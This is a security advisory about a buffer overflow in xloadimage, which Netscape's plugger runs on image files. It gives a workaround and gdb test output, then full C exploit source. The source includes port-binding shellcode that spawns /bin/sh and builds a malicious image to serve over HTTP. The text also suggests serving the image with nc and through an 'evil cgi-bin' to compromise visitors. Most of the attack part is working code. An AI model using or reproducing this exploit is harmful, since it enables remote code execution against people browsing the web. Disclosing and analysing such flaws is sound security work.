The xloadimage application suffers from a buffer overflow vulnerability. While this is normally not a security problem, xloadimage is called by the 'plugger' program from inside Netscape to handle some image types. Hence, a remote site could cause arbitrary code to be executed as the user running Netscape. It is recommended that users of Netscape and plugger update to the fixed xloadimage packages.
Credit:
The information has been provided by zen-parse.
/usr/X11R6/bin/xloadimage is a plugin, used by Netscape 4.77, via /usr/lib/netscape/plugins/plugger.so, to display certain types of images (TIFF and Sun Rasterfile formats, as the setup in /etc/pluggerrc has by default) in the Netscape browser window.
The problem is that xloadimage has an exploitable overflow in the handling of faces format images. The vulnerability allows an attacker to cause Netscape to launch a shell code, due to a coding error:
Workaround:
Disable xloadimage from being used as a helper application for Netscape by changing the line /etc/pluggerrc that reads:
exits: xloadimage -quiet -windowid $window $file
Into
# exits: xloadimage -quiet -windowid $window $file
Or remove that line.
How to test:
bash-2.04$ make tstot
cc tstot.c -o tstot
bash-2.04$ ./tstot >tstot.tif
bash-2.04$ ls -al tstot.tif
-rw-r--r-- 1 evil evil 75707 Jun 27 16:53 tstot.tif
bash-2.04$ gdb -q xloadimage
(no debugging symbols found)...(gdb) r evil.tif
Starting program: /usr/X11R6/bin/xloadimage evil.tif
(no debugging symbols found)...(no debugging symbols found)...
evil.tif is a 32x32 8-bit grayscale Faces Project image
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb)
Another way of launching the exploit is:
bash-2.04$ ./tstot something|nc -l -p 9876
And do a refresh in your HTML:
This could also be made into an evil cgi-bin that checks for a (potentially) vulnerable machine before firing it to them, and then connects to the listening port and 0wns them with a local exploit.
Exploit:
//#define TARGET 0x080e1337
//as 1337 as the 1337357 kiddies.
#define TARGET 0xdeadbeef
// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
//
char lamagra_bind_code[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
// slight modification so it listens on 7465 instead of 3879
// TAGS is easier to remember ;]
char *
this (int doit)
{
char *p;
int v;
p = (char *) malloc (8200);
memset (p, 0x90, 8200);
if (!doit)
for (v = 0; v < 8100; v += 122)
{
p[v] = 0xeb;
p[v + 1] = 120;
}
if (doit)
memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
p[8199] = 0;
return p;
}
main (int argc)
{
int z0, x = TARGET;
int z1, y = x;
int p;
char *q;
if (argc > 1)
printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
printf ("FirstName: %s\n", this (0));
printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
printf ("%s\n", &x);
// Begin Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
// End Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (1));
printf ("http://www.mp3.com/cosv");
printf ("\nPicData: 32 32 8\n");
printf ("\n");
for (p = 0; p < 9994; p += 1)
printf ("A");
}
